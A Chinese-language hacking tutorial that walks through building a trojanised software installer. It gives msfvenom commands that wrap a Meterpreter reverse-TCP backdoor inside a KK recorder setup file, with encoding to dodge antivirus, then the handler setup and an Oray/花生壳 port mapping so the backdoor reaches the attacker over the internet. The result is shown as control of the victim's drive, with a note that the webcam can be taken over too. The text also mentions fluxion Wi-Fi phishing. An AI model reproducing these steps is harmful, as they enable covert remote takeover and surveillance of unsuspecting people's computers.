目录
2、目标打开软件,攻击者后台获得相应控制权,图为查看目标C盘内容
一、攻击过程
前提:局域网内后门生成,因为没做免杀处理,测试需要关闭杀毒软件,外网攻击需要用到内网穿透已更,还可以利用fluxion进行wifi钓鱼,前提网卡必须支持。
1、木马文件生成
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.191.4 LPORT=4444 -x KKSetup.exe -k -f exe -o KKSetup.exe
-p 根据对应的载荷payload生成对应平台下的后门
-e 编码免杀
-i 编码次数
-x|-k 伪装在哪个正常软件上
-o 输出的位置和文件名
lhost&lport 攻击者的ip和端口
进入后台msfconsole
2、使用handler模块
use exploit/multi/handler
3、设置PAYLOAD
set PAYLOAD windows/meterpreter/reverse_tcp
4、查看设置
show options
5、设置
set lhost xxxx
set lport xxxx
6、开始监听
exploit
二、验证结果
1、目标机器显示为正常的KK录像机安装文件
2、目标打开软件,攻击者后台获得相应控制权,图为查看目标C盘内容
3、如果希望控制目标摄像头,可以用到webcat
三、内网穿透操作
1、先注册花生壳并下载花生壳客户端
如果需要用到内网映射生成外网木马
生成木马时lhost和lport填写花生壳ip地址端口
2、点击内网穿透,设置映射
内网为你kali的ip地址,端口为5555设置与生成木马时一至即可
点击提交即可。
3、生成木马
在生成木马时,我们需要花生壳
的ip
和端口
点击诊断,即可查看花生壳的ip
花生壳的端口:
域名后面的,即为花生壳的端口
4、配置msfconsole
需要注意的是,在配置msfconsole时,我们不能配置花生壳的端口和ip,应该是我们kali本机的ip和端口。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.169.xxx.xxx
set LPORT 5555
5、验证
手机断开局域网,切换至流量,打开木马文件,攻击端获得控制权,如无反应确认是否被杀软拦截
四、免杀处理操作
1、待更!